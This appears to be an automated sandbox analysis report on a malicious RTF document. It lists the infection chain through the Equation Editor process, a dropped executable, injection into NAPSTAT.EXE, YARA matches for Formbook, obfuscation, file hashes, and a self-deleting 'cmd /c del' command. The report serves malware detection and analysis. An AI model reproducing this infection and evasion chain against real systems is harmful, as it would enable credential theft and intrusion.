Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FD5C NtEnumerateKey,	7_2_00A8FD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FEA0 NtReadVirtualMemory,	7_2_00A8FEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FE24 NtWriteVirtualMemory,	7_2_00A8FE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FFFC NtCreateProcessEx,	7_2_00A8FFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FF34 NtQueueApcThread,	7_2_00A8FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099D60 NtCreateFile,	7_2_00099D60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099E10 NtReadFile,	7_2_00099E10
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099E90 NtClose,	7_2_00099E90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099F40 NtAllocateVirtualMemory,	7_2_00099F40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099E0A NtReadFile,	7_2_00099E0A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099E8A NtClose,	7_2_00099E8A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099F3F NtAllocateVirtualMemory,	7_2_00099F3F

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Roaming\propser16364.exe

4_2_00403461

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_00406925	4_2_00406925
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041E814	5_2_0041E814
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041D0A2	5_2_0041D0A2
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00409E40	5_2_00409E40
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00409E3B	5_2_00409E3B
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083E0C6	5_2_0083E0C6
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0086D005	5_2_0086D005
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00843040	5_2_00843040
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0085905A	5_2_0085905A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083E2E9	5_2_0083E2E9
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008E1238	5_2_008E1238
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083F3CF	5_2_0083F3CF
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008663DB	5_2_008663DB
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00842305	5_2_00842305
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00847353	5_2_00847353
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0088A37B	5_2_0088A37B
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00875485	5_2_00875485
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00851489	5_2_00851489
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0087D47D	5_2_0087D47D
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0085C5F0	5_2_0085C5F0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084351F	5_2_0084351F
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00844680	5_2_00844680
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084E6C1	5_2_0084E6C1
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008E2622	5_2_008E2622
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008C579A	5_2_008C579A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084C7BC	5_2_0084C7BC
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008757C3	5_2_008757C3
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008DF8EE	5_2_008DF8EE
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084C85C	5_2_0084C85C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0086286D	5_2_0086286D
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008E098E	5_2_008E098E
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008429B2	5_2_008429B2
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008569FE	5_2_008569FE
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008C5955	5_2_008C5955
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008F3A83	5_2_008F3A83
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008ECBA4	5_2_008ECBA4
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083FBD7	5_2_0083FBD7
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008CDBDA	5_2_008CDBDA
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00867B00	5_2_00867B00
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008DFDDD	5_2_008DFDDD
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00870D3B	5_2_00870D3B
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084CD5B	5_2_0084CD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9E0C6	7_2_00A9E0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ACD005	7_2_00ACD005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA3040	7_2_00AA3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AB905A	7_2_00AB905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9E2E9	7_2_00A9E2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B41238	7_2_00B41238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9F3CF	7_2_00A9F3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AC63DB	7_2_00AC63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA2305	7_2_00AA2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AEA37B	7_2_00AEA37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA7353	7_2_00AA7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AB1489	7_2_00AB1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AD5485	7_2_00AD5485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ADD47D	7_2_00ADD47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ABC5F0	7_2_00ABC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA351F	7_2_00AA351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA4680	7_2_00AA4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AAE6C1	7_2_00AAE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B42622	7_2_00B42622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AAC7BC	7_2_00AAC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B2579A	7_2_00B2579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AD57C3	7_2_00AD57C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B3F8EE	7_2_00B3F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AC286D	7_2_00AC286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AAC85C	7_2_00AAC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA29B2	7_2_00AA29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B4098E	7_2_00B4098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AB69FE	7_2_00AB69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B25955	7_2_00B25955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B53A83	7_2_00B53A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B4CBA4	7_2_00B4CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B2DBDA	7_2_00B2DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9FBD7	7_2_00A9FBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AC7B00	7_2_00AC7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B3FDDD	7_2_00B3FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AD0D3B	7_2_00AD0D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AACD5B	7_2_00AACD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AD2E2F	7_2_00AD2E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ABEE4C	7_2_00ABEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AB0F3F	7_2_00AB0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ACDF7C	7_2_00ACDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009D0A2	7_2_0009D0A2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009E814	7_2_0009E814
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00089E3B	7_2_00089E3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00089E40	7_2_00089E40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00082FB0	7_2_00082FB0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe 7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll 974E158EA37951D137839D4189279330AA2E85F5BAFA4F273F7007673CD4D3FC
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\propser16364.exe 7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 0083E2A8 appears 37 times
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 0083DF5C appears 106 times
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 00883F92 appears 104 times
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 008AF970 appears 79 times
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 0088373B appears 214 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00B0F970 appears 81 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00A9DF5C appears 112 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00AE3F92 appears 108 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00AE373B appears 238 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00A9E2A8 appears 38 times

Yara signature match

Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winRTF@10/12@4/3

Source: C:\Users\user\AppData\Roaming\propser16364.exe

4_2_00403461

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_0040473E

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,

4_2_0040216B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$080fbf_by_Libranalysis.rtf

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC38D.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: c8080fbf_by_Libranalysis.rtf	Virustotal: Detection: 50%
Source: c8080fbf_by_Libranalysis.rtf	ReversingLabs: Detection: 51%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'	Jump to behavior

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: propser16364.exe, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: propser16364.exe, 00000005.00000002.2123186135.0000000002440000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Unpacked PE file: 5.2.propser16364.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0040E8A7 push ds; retf	5_2_0040E8A8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_004171BB push edx; iretd	5_2_004171BF
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00417294 push ecx; iretd	5_2_00417295
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00416B6B push ds; iretd	5_2_00416B72
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0040E3E0 push EC8EF736h; retf	5_2_0040E402
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00417CB1 push esi; iretd	5_2_00417CB2
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_004085A2 push ebx; ret	5_2_004085A3
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041CEB5 push eax; ret	5_2_0041CF08
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041CF6C push eax; ret	5_2_0041CF72
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041CF02 push eax; ret	5_2_0041CF08
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041CF0B push eax; ret	5_2_0041CF72
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00417726 push ss; retf	5_2_0041773E
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0040478A push eax; iretd	5_2_0040478F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9DFA1 push ecx; ret	7_2_00A9DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000971BB push edx; iretd	7_2_000971BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00097294 push ecx; iretd	7_2_00097295
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0008E3E0 push EC8EF736h; retf	7_2_0008E402
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000885A2 push ebx; ret	7_2_000885A3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00097726 push ss; retf	7_2_0009773E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0008478A push eax; iretd	7_2_0008478F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0008E8A7 push ds; retf	7_2_0008E8A8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00096B6B push ds; iretd	7_2_00096B72
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00097CB1 push esi; iretd	7_2_00097CB2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CEB5 push eax; ret	7_2_0009CF08
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CF0B push eax; ret	7_2_0009CF72
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CF02 push eax; ret	7_2_0009CF08
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CF6C push eax; ret	7_2_0009CF72

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\AppData\Roaming\propser16364.exe	File created: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\propser16364.exe	Jump to dropped file
